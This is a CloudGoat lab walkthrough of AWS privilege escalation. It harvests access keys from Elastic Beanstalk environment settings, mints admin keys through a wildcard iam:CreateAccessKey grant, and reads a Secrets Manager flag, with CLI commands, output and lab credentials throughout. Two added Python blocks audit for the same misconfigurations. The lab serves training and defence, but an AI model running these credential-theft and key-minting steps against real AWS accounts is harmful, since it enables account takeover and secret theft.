Beanstalk (CloudGoat)
Initial Access
# credentials
initial_low_priv_credentials = Access Key: AKIA4YM7GTDHDNB4GXV7
Secret Key: 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
# configure
aws configure --profile low_level
AWS Access Key ID [None]: AKIA4YM7GTDHDNB4GXV7
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
#whoami
aws sts get-caller-identity --profile low_level
{
"UserId": "AIDA4YM7GTDHOLCJS5VMB",
"Account": "877044078798",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user"
}
Enumeration
# listing attached policies
aws iam list-attached-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level
An error occurred (AccessDenied) when calling the ListAttachedUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListAttachedUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListAttachedUserPolicies action
# listing inline policies
aws iam list-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level
An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListUserPolicies action
# switching to pacu
# brute forcing permissions
Pacu (beanstalk:imported-low_level) > run iam__bruteforce_permissions
"Permissions": {
"Allow": [
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints",
"sts:GetSessionToken",
"sts:GetCallerIdentity",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints",
"dynamodb:DescribeEndpoints",
"ec2:DescribeSubnets",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints"
Given the name beanstalk, we can take a logical guess and assume there is some kind of AWS Elastic Beanstalk instance
What is AWS Elastic Beanstalk
AWS Elastic Beanstalk is a PaaS offering by AWS that simplifies the process of deploying, managing and scaling web applications and services
Key concepts
What it does:
Elastic Beanstalk automatically handles:
Provisioning infrastructure (e.g., EC2, Load Balancers, Auto Scaling)
Deploying code in supported environments
Monitoring application health and metrics
Scaling resources based on load
Supported Stacks
Languages and frameworks: Java, .NET, Node.js, Python, PHP, Ruby, Go, and Docker
Application servers: Apache, Nginx, Passenger, and IIS
Deployment Model
You just upload your code, and Beanstalk handles:
EC2 provisioning
Load balancing
Auto-scaling
Monitoring/logs via CloudWatch
Enumerating Beanstalk applications and environments
List all Elastic Beanstalk Applications
aws elasticbeanstalk describe-applications --profile low_level
{
  "Applications": [
    {
      "ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-app",
      "ApplicationName": "cgidg0l919nvpe-app",
      "Description": "Elastic Beanstalk application for insecure secrets scenario",
      "DateCreated": "2025-07-09T08:35:26.190000+00:00",
      "DateUpdated": "2025-07-09T08:35:26.190000+00:00",
      "ConfigurationTemplates": [],
      "ResourceLifecycleConfig": {
        "VersionLifecycleConfig": {
          "MaxCountRule": {
            "Enabled": false,
            "MaxCount": 200,
            "DeleteSourceFromS3": false
          },
          "MaxAgeRule": {
            "Enabled": false,
            "MaxAgeInDays": 180,
            "DeleteSourceFromS3": false
          }
        }
      }
    }
  ]
}
As you can see, we have found a beanstalk application, from which we can see the following
ApplicationArn:
arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-app
ApplicationName:
cgidg0l919nvpe-app
etc
We can enumerate the environment
aws elasticbeanstalk describe-environments \
  --application-name cgidg0l919nvpe-app \
  --profile low_level \
  --region us-east-1
{
  "Environments": [
    {
      "EnvironmentName": "cgidg0l919nvpe-env",
      "EnvironmentId": "e-qdmmkwibbc",
      "ApplicationName": "cgidg0l919nvpe-app",
      "SolutionStackName": "64bit Amazon Linux 2023 v4.6.0 running Python 3.11",
      "PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0",
      "EndpointURL": "awseb-e-q-AWSEBLoa-77L0EJYWIEY-1878151744.us-east-1.elb.amazonaws.com",
      "CNAME": "cgidg0l919nvpe-env.eba-usp2hym4.us-east-1.elasticbeanstalk.com",
      "DateCreated": "2025-07-09T08:35:48.437000+00:00",
      "DateUpdated": "2025-07-09T08:38:31.684000+00:00",
      "Status": "Ready",
      "AbortableOperationInProgress": false,
      "Health": "Grey",
      "HealthStatus": "No Data",
      "Tier": {
        "Name": "WebServer",
        "Type": "Standard",
        "Version": "1.0"
      },
      "EnvironmentLinks": [],
      "EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:environment/cgidg0l919nvpe-app/cgidg0l919nvpe-env"
    }
  ]
}
What we are looking for:
Environment names
CNAMEs
Status, health
Possible public-facing endpoints or services
Now we want to extract configuration settings (Secrets)
aws elasticbeanstalk describe-configuration-settings \
  --application-name cgidg0l919nvpe-app \
  --profile low_level \
  --region us-east-1 \
  --environment-name cgidg0l919nvpe-env
Output
I've placed the most interesting secret below:
{
  "Namespace": "aws:elasticbeanstalk:application:environment",
  "OptionName": "SECONDARY_ACCESS_KEY",
  "Value": "AKIA4YM7GTDHGW25E5ZA"
},
{
  "Namespace": "aws:elasticbeanstalk:application:environment",
  "OptionName": "SECONDARY_SECRET_KEY",
  "Value": "kdHPJjBtb/lbwxuXprl16prklzWqT8MlMse7bpwr"
}
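The same output can be checked from the defender's side. The following is an added example, not part of the original walkthrough: a small audit that takes parsed `describe-configuration-settings` JSON and flags environment properties that look like credential material. The sample data is constructed, the key values are AWS's documentation placeholders, and the rule that a secret-store ARN counts as a reference rather than a secret is an assumption of this sketch.

```python
import re

ENV_NAMESPACE = "aws:elasticbeanstalk:application:environment"
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")
CREDENTIAL_NAME = re.compile(r"SECRET|PASSWORD|PASSWD|TOKEN|ACCESS_KEY|API_KEY", re.I)
# Assumption: a value that is only an ARN pointing at a secret store is a
# reference the app resolves at runtime, not the secret itself.
REFERENCE_PREFIXES = ("arn:aws:secretsmanager:", "arn:aws:ssm:")

def find_exposed_settings(describe_output):
    """Flag environment properties that appear to hold credential material."""
    findings = []
    for cfg in describe_output.get("ConfigurationSettings", []):
        env = cfg.get("EnvironmentName", "<unnamed>")
        for opt in cfg.get("OptionSettings", []):
            if opt.get("Namespace") != ENV_NAMESPACE:
                continue  # only environment properties are examined here
            name, value = opt.get("OptionName", ""), opt.get("Value") or ""
            if not value or value.startswith(REFERENCE_PREFIXES):
                continue
            reasons = []
            if ACCESS_KEY_ID.search(value):
                reasons.append("value matches AWS access key ID format")
            if CREDENTIAL_NAME.search(name):
                reasons.append("option name suggests a credential")
            if reasons:
                findings.append({"environment": env, "option": name, "reasons": reasons})
    return findings

# Constructed sample shaped like describe-configuration-settings output;
# key values are AWS's documentation placeholders, not the lab's.
SAMPLE_OUTPUT = {"ConfigurationSettings": [{
    "EnvironmentName": "example-env",
    "OptionSettings": [
        {"Namespace": ENV_NAMESPACE, "OptionName": "SECONDARY_ACCESS_KEY",
         "Value": "AKIAIOSFODNN7EXAMPLE"},
        {"Namespace": ENV_NAMESPACE, "OptionName": "SECONDARY_SECRET_KEY",
         "Value": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
        {"Namespace": ENV_NAMESPACE, "OptionName": "DB_PASSWORD",
         "Value": "arn:aws:secretsmanager:us-east-1:111122223333:secret:db-pass"},
        {"Namespace": ENV_NAMESPACE, "OptionName": "PYTHONPATH",
         "Value": "/var/app/venv/bin"},
        {"Namespace": "aws:autoscaling:launchconfiguration",
         "OptionName": "IamInstanceProfile", "Value": "example-profile"},
    ]}]}

if __name__ == "__main__":
    for f in find_exposed_settings(SAMPLE_OUTPUT):
        print(f["environment"], f["option"], "; ".join(f["reasons"]))
```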
We could have speed-run this with Pacu's elasticbeanstalk__enum module.
From enumerating the Beanstalk environment configuration we have found some credential material
# configure
aws configure --profile beanstalk
AWS Access Key ID [None]: AKIA4YM7GTDHGW25E5ZA
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
# whoami
aws sts get-caller-identity --profile beanstalk
{
  "UserId": "AIDA4YM7GTDHFW7VIBRD5",
  "Account": "877044078798",
  "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user"
}
# pacu
# after importing beanstalk creds, brute force permissions
Pacu (beanstalk:imported-beanstalk) > run iam__bruteforce_permissions
Enumerating as the secondary user
Enumerating users within the AWS account
aws iam list-users --profile beanstalk
{
"Users": [
{
"Path": "/",
"UserName": "cgidg0l919nvpe_admin_user",
"UserId": "AIDA4YM7GTDHMRHIFUQTS",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user",
"CreateDate": "2025-07-09T08:35:26+00:00"
},
{
"Path": "/",
"UserName": "cgidg0l919nvpe_low_priv_user",
"UserId": "AIDA4YM7GTDHOLCJS5VMB",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user",
"CreateDate": "2025-07-09T08:35:27+00:00"
},
{
"Path": "/",
"UserName": "cgidg0l919nvpe_secondary_user",
"UserId": "AIDA4YM7GTDHFW7VIBRD5",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user",
"CreateDate": "2025-07-09T08:35:26+00:00"
},
{
"Path": "/",
"UserName": "cloudgoat",
"UserId": "AIDA4YM7GTDHAVQ7JT75L",
"Arn": "arn:aws:iam::877044078798:user/cloudgoat",
"CreateDate": "2025-06-30T03:27:40+00:00"
}
]
}
Listing attached user policies for secondary user
aws iam list-attached-user-policies --user-name cgidg0l919nvpe_secondary_user --profile beanstalk
{
"AttachedPolicies": [
{
"PolicyName": "cgidg0l919nvpe_secondary_policy",
"PolicyArn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy"
}
]
}
Viewing attached user policy metadata
aws iam get-policy --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --profile beanstalk
{
"Policy": {
"PolicyName": "cgidg0l919nvpe_secondary_policy",
"PolicyId": "ANPA4YM7GTDHPO75PGETD",
"Arn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2025-07-09T08:35:26+00:00",
"UpdateDate": "2025-07-09T08:35:26+00:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}
Viewing the actual attached policy
aws iam get-policy-version --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --version-id v1 --profile beanstalk
{
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-07-09T08:35:26+00:00"
}
}
If we look at the following
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
}
This allows the creation of new access keys for any IAM user
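As an added example (not from the original walkthrough), the check below flags this pattern in a policy document and shows the corrected form, where `iam:CreateAccessKey` is scoped to the caller's own user with the `${aws:username}` policy variable. The function names are hypothetical, and `Condition` and `NotAction` elements are not evaluated.

```python
from fnmatch import fnmatchcase

SELF_SCOPED = "${aws:username}"  # IAM policy variable for the calling user's name

def as_list(value):
    return [value] if isinstance(value, str) else list(value or [])

def risky_create_access_key(policy_document):
    """Return indexes of Allow statements that permit iam:CreateAccessKey
    on users other than the caller. Condition/NotAction are not evaluated."""
    statements = policy_document.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    risky = []
    for index, stmt in enumerate(statements):
        if stmt.get("Effect") != "Allow":
            continue
        # IAM action names are case-insensitive and may use * and ? wildcards.
        actions = [a.lower() for a in as_list(stmt.get("Action"))]
        if not any(fnmatchcase("iam:createaccesskey", a) for a in actions):
            continue
        # Any resource pattern not pinned to the caller's own user is too broad.
        if any(SELF_SCOPED not in r for r in as_list(stmt.get("Resource"))):
            risky.append(index)
    return risky

# The two Allow statements from the policy shown above (read-only list trimmed).
PAGE_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Action": ["iam:CreateAccessKey"], "Effect": "Allow", "Resource": "*"},
    {"Action": ["iam:ListUsers", "iam:GetUser", "iam:GetPolicyVersion"],
     "Effect": "Allow", "Resource": "*"},
]}

# Corrected form: a user may only create keys for itself.
HARDENED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Action": ["iam:CreateAccessKey"], "Effect": "Allow",
     "Resource": "arn:aws:iam::*:user/${aws:username}"},
    PAGE_POLICY["Statement"][1],
]}

if __name__ == "__main__":
    print("page policy:", risky_create_access_key(PAGE_POLICY))
    print("hardened policy:", risky_create_access_key(HARDENED_POLICY))
```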
Privilege escalation to admin user
From this we can create a new access key for the administrative user
aws iam create-access-key --user-name cgidg0l919nvpe_admin_user --profile beanstalk
{
  "AccessKey": {
    "UserName": "cgidg0l919nvpe_admin_user",
    "AccessKeyId": "AKIA4YM7GTDHFFR5Y26E",
    "Status": "Active",
    "SecretAccessKey": "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",
    "CreateDate": "2025-07-09T09:56:39+00:00"
  }
}
We can now assume the admin user's identity
aws configure --profile beanstalk_admin
AWS Access Key ID [None]: AKIA4YM7GTDHFFR5Y26E
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
#whoami
aws sts get-caller-identity --profile beanstalk_admin
{
  "UserId": "AIDA4YM7GTDHMRHIFUQTS",
  "Account": "877044078798",
  "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user"
}
Now we can retrieve the final flag from AWS Secrets Manager
# Listing secrets in secret manager
aws secretsmanager list-secrets --profile beanstalk_admin
{
  "SecretList": [
    {
      "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx",
      "Name": "cgidg0l919nvpe_final_flag",
      "LastChangedDate": "2025-07-09T18:35:28.773000+10:00",
      "LastAccessedDate": "2025-07-09T10:00:00+10:00",
      "Tags": [
        {
          "Key": "Stack",
          "Value": "CloudGoat"
        },
        {
          "Key": "Scenario",
          "Value": "beanstalk_secrets"
        }
      ],
      "SecretVersionsToStages": {
        "terraform-20250709083527730700000002": [
          "AWSCURRENT"
        ]
      },
      "CreatedDate": "2025-07-09T18:35:25.827000+10:00"
    }
  ]
}
# retrieving the flag
aws secretsmanager get-secret-value --secret-id cgidg0l919nvpe_final_flag --profile beanstalk_admin
{
  "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx",
  "Name": "cgidg0l919nvpe_final_flag",
  "VersionId": "terraform-20250709083527730700000002",
  "SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}",
  "VersionStages": [
    "AWSCURRENT"
  ],
  "CreatedDate": "2025-07-09T18:35:28.768000+10:00"
}